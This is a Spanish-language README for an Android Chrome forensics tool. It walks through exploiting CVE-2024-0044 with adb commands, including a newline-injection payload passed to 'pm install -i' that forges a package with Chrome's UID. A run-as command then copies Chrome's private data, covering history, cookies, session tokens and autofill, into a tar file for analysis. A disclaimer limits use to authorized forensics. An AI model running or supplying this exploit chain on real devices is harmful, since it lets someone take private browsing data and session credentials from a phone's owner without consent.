
Una herramienta robusta de forense digital para extraer y analizar artefactos de Google Chrome desde dispositivos Android.
Una herramienta robusta de forense digital para extraer y analizar artefactos de Google Chrome desde dispositivos Android
Características • Instalación • Uso • Documentación
Autor: JackTekno
GitHub: github.com/JackTekno
Esta herramienta utiliza la vulnerabilidad CVE-2024-0044 (Run-as) para eludir restricciones de permisos en dispositivos Android 12/13 no rooteados, permitiendo la extracción forense de datos de Google Chrome. La herramienta analiza bases de datos SQLite sin procesar y genera informes de análisis exhaustivos.

Flujo de trabajo completo de análisis forense desde la adquisición hasta la generación de informes
La herramienta genera un informe Excel completo (result_chrome_forensic.xlsx) con las siguientes hojas:
F-Droid.apk)Clonar el repositorio
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
Instalar dependencias
pip install -r requirements.txt
# Sube un APK ficticio a la carpeta temporal
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Ejemplo de salida: package:com.android.chrome uid:10129
# Anota el UID (ej., 10129)
⚠️ Reemplaza
10129con el UID real de Chrome obtenido en el Paso 3
adb shell
# Dentro del shell ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Ejecuta el administrador de paquetes
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Todavía dentro del shell ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Salir del shell ADB
exit
adb pull /data/local/tmp/chrome.tar .
Extrae el archivo 'chrome.tar' en la carpeta del proyecto. No es necesario mover archivos manualmente. El script de Python encontrará automáticamente los archivos de base de datos dentro de las carpetas extraídas.
tar -xf chrome.tar
Ejecuta la herramienta de análisis forense:
python3 chrome_forensic.py
La herramienta analizará los archivos de base de datos y generará result_chrome_forensic.xlsx en el mismo directorio.
⚠️ IMPORTANTE: Esta herramienta está diseñada únicamente para fines educativos y de análisis forense autorizado.
- Úsala solo en dispositivos que poseas o sobre los que tengas permiso explícito por escrito para analizar
- El acceso no autorizado a dispositivos digitales puede violar las leyes de tu jurisdicción
- Los autores no asumen ninguna responsabilidad por el uso indebido de esta herramienta
¡Las contribuciones son bienvenidas! No dudes en enviar un Pull Request.
Este proyecto está licenciado bajo la Licencia Pública General de GNU v3.0. Consulta el archivo LICENSE para más detalles.
La prueba de concepto del método de adquisición fue resumida y compartida por Tinyhack.com.
Hecho con ❤️ por JackTekno
⭐ Dale una estrella a este repositorio • 🐛 Reportar un error • 💡 Solicitar una característica
| Nombre de la Hoja | Descripción |
|---|
| 📖 Historial de Navegación | Línea de tiempo detallada de URLs visitadas |
| 📈 Analítica – Sitios Principales | Ranking estadístico de los dominios más visitados |
| ⚠️ ALERTAS – Sospechosos | URLs marcadas automáticamente (hacking, drogas, contenido adulto) |
| 📥 Descargas | Historial de descargas con rutas y tamaños de archivo |
| 🔍 Términos de Búsqueda | Consultas de búsqueda del usuario desde el omnibox/Google |
| 🍪 Cookies y Sesiones | Tokens de sesión y metadatos de cookies (cifrados en Hex) |
| ✍️ Datos de Autocompletado | Datos de formularios guardados (nombres, direcciones, etc.) |